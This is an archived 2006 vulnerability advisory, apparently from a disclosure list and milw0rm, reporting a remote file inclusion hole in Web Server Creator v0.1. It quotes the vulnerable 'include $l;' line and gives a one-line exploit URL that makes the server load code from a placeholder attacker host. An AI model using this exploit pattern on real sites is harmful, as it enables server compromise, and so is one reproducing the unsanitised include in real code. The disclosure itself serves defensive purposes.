Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP

[Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

[Full-disclosure] KorviBlog - XSS permanent !

Multible injections and vulnerabilities in Jetbox CMS

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	11.09.2006
Subject:	Web Server Creator v0.1 (l) Remote Include Vulnerability

###########################################################

#Web Server Creator v0.1 (l) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:   include $l;

############################################################

#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA,  gьltekin

############################################################

# milw0rm.com [2006-09-07]

orj. adv: http://www.milw0rm.com/exploits/2318